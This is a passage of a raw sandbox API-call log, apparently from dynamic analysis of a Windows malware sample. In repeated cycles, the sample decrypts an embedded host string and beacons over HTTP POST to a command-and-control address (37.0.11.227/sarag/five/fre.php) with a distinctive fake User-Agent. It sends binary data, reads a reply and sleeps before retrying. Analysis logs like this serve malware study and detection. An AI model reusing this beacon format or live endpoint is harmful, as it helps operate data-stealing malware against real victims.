hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0215.412] GetProcessHeap () returned 0x690000 [0215.412] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0215.413] closesocket (s=0x524) returned 0 [0215.413] GetProcessHeap () returned 0x690000 [0215.413] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0215.413] GetProcessHeap () returned 0x690000 [0215.413] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0215.413] GetProcessHeap () returned 0x690000 [0215.413] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0215.414] GetProcessHeap () returned 0x690000 [0215.414] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0215.414] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x728) returned 0x524 [0215.415] Sleep (dwMilliseconds=0xea60) [0215.417] GetProcessHeap () returned 0x690000 [0215.417] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0215.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.418] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.423] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0215.431] GetProcessHeap () returned 0x690000 [0215.431] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0215.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.432] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0215.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.432] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.433] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.433] GetProcessHeap () returned 0x690000 [0215.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0215.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.435] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0215.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.435] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0215.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.438] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0215.438] GetProcessHeap () returned 0x690000 [0215.438] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0215.439] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.439] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0215.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.440] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0215.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.441] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0215.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.442] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0215.442] GetProcessHeap () returned 0x690000 [0215.442] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0215.442] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0215.442] GetProcessHeap () returned 0x690000 [0215.443] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0215.443] GetProcessHeap () returned 0x690000 [0215.443] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0215.443] GetProcessHeap () returned 0x690000 [0215.444] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0215.444] GetProcessHeap () returned 0x690000 [0215.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0215.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.445] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.457] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0215.466] GetProcessHeap () returned 0x690000 [0215.466] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0215.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.468] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0215.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.473] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.475] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.475] GetProcessHeap () returned 0x690000 [0215.476] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0215.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.477] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0215.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.496] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0215.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.497] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0215.497] GetProcessHeap () returned 0x690000 [0215.497] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0215.497] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.498] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0215.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.498] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0215.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.501] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0215.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.502] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0215.502] GetProcessHeap () returned 0x690000 [0215.502] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0215.502] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0215.502] GetProcessHeap () returned 0x690000 [0215.502] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3b0 [0215.502] socket (af=2, type=1, protocol=6) returned 0x528 [0215.503] connect (s=0x528, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0215.526] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0215.526] GetProcessHeap () returned 0x690000 [0215.526] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0215.526] GetProcessHeap () returned 0x690000 [0215.526] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0215.527] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0215.528] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0215.528] GetProcessHeap () returned 0x690000 [0215.528] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0215.528] GetProcessHeap () returned 0x690000 [0215.529] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0215.529] GetProcessHeap () returned 0x690000 [0215.529] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0215.529] GetProcessHeap () returned 0x690000 [0215.529] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0215.530] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0215.531] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0215.531] GetProcessHeap () returned 0x690000 [0215.531] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0215.531] GetProcessHeap () returned 0x690000 [0215.531] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0215.531] send (s=0x528, buf=0x6ab500*, len=242, flags=0) returned 242 [0215.532] send (s=0x528, buf=0x6aba40*, len=159, flags=0) returned 159 [0215.532] GetProcessHeap () returned 0x690000 [0215.532] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0215.532] recv (in: s=0x528, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0215.604] GetProcessHeap () returned 0x690000 [0215.604] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0215.604] GetProcessHeap () returned 0x690000 [0215.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0215.605] GetProcessHeap () returned 0x690000 [0215.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0215.605] GetProcessHeap () returned 0x690000 [0215.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0215.605] closesocket (s=0x528) returned 0 [0215.606] GetProcessHeap () returned 0x690000 [0215.606] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3b0 | out: hHeap=0x690000) returned 1 [0215.606] GetProcessHeap () returned 0x690000 [0215.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0215.607] GetProcessHeap () returned 0x690000 [0215.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0215.607] GetProcessHeap () returned 0x690000 [0215.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0215.608] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf04) returned 0x528 [0215.610] Sleep (dwMilliseconds=0xea60) [0215.614] GetProcessHeap () returned 0x690000 [0215.614] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0215.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.616] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.623] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0215.631] GetProcessHeap () returned 0x690000 [0215.631] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0215.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.635] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0215.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.636] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.637] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.637] GetProcessHeap () returned 0x690000 [0215.638] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0215.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.639] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0215.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.640] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0215.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.641] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0215.641] GetProcessHeap () returned 0x690000 [0215.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0215.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.642] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0215.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.649] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0215.650] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.650] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0215.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.652] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0215.652] GetProcessHeap () returned 0x690000 [0215.652] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0215.652] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0215.652] GetProcessHeap () returned 0x690000 [0215.653] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0215.653] GetProcessHeap () returned 0x690000 [0215.653] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0215.653] GetProcessHeap () returned 0x690000 [0215.654] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0215.654] GetProcessHeap () returned 0x690000 [0215.654] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0215.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.655] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.663] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0215.672] GetProcessHeap () returned 0x690000 [0215.672] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0215.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.673] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0215.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.674] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.675] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.675] GetProcessHeap () returned 0x690000 [0215.676] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0215.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.679] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0215.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.680] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0215.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.681] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0215.681] GetProcessHeap () returned 0x690000 [0215.681] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0215.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.682] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0215.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.683] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0215.684] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.684] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0215.685] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.685] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0215.685] GetProcessHeap () returned 0x690000 [0215.685] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0215.685] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0215.685] GetProcessHeap () returned 0x690000 [0215.686] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0215.686] socket (af=2, type=1, protocol=6) returned 0x52c [0215.686] connect (s=0x52c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0215.713] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0215.713] GetProcessHeap () returned 0x690000 [0215.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0215.713] GetProcessHeap () returned 0x690000 [0215.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0215.714] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0215.715] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0215.715] GetProcessHeap () returned 0x690000 [0215.715] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0215.715] GetProcessHeap () returned 0x690000 [0215.716] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0215.716] GetProcessHeap () returned 0x690000 [0215.716] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0215.716] GetProcessHeap () returned 0x690000 [0215.716] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0215.717] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0215.718] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0215.718] GetProcessHeap () returned 0x690000 [0215.718] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0215.718] GetProcessHeap () returned 0x690000 [0215.718] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0215.718] send (s=0x52c, buf=0x6ab500*, len=242, flags=0) returned 242 [0215.719] send (s=0x52c, buf=0x6aba40*, len=159, flags=0) returned 159 [0215.719] GetProcessHeap () returned 0x690000 [0215.719] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0215.719] recv (in: s=0x52c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0215.838] GetProcessHeap () returned 0x690000 [0215.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0215.838] GetProcessHeap () returned 0x690000 [0215.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0215.838] GetProcessHeap () returned 0x690000 [0215.839] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0215.839] GetProcessHeap () returned 0x690000 [0215.839] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0215.839] closesocket (s=0x52c) returned 0 [0215.840] GetProcessHeap () returned 0x690000 [0215.840] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0215.840] GetProcessHeap () returned 0x690000 [0215.840] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0215.841] GetProcessHeap () returned 0x690000 [0215.841] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0215.841] GetProcessHeap () returned 0x690000 [0215.841] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0215.860] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x9ac) returned 0x52c [0215.862] Sleep (dwMilliseconds=0xea60) [0215.868] GetProcessHeap () returned 0x690000 [0215.868] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0215.870] LoadLibraryW 